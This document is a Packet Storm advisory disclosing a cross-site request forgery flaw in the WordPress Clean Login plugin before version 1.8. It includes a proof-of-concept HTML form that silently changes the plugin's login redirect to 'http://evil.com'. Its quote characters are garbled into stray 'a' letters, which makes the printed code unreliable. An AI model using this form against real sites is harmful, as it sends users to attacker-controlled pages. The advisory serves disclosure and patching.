WordPress Clean Login plugin versions prior to 1.8 suffer from a cross site request forgery vulnerability.
6d8f8eb3f120167733389394fe39eff5500ef278c7bbafa598e88a0410e386dc===============
Software Description
===============
Software:clean login
version:<1.8
description:Responsive Frontend Login and Registration plugin.
========
Details
========
CSRF in wordpress plugin clean login allows remote attacker change wordpress login redirect url or logout redirect url to evil address.
========
POC:
========
<form method="POST" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wpcsw_settings">
<input type="text" name= "adminbar" value=aon">
a<input type="text" name="emailnotificationcontent" value="">
a<input type="text" name="termsconditionsMSG" value="">
a<input type="text" name="termsconditionsURL" value="">
a<input type="text" name="urlredirect" value=ahttp://127.0.0.1/wordpressa>
a<input type=atexta name="loginredirecta value=aona>
a<input type=atexta name="loginredirect_urla value="http://evil.coma>
a<input type=atexta name="logoutredirect_urla value="http://127.0.0.1/wordpressa>
a<input type=atexta name="cl_hidden_fielda value="hidden_field_to_update_othersa>
a<input type=atexta name="Submita value="Save Changesa>
<input type="submita>
</form>
=========
Mitigations
================
Disable the plugin until a new version is released that fixes this bug.
=========
Fixed
=========
https://wordpress.org/plugins/clean-login/#developers(1.8 version update)
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed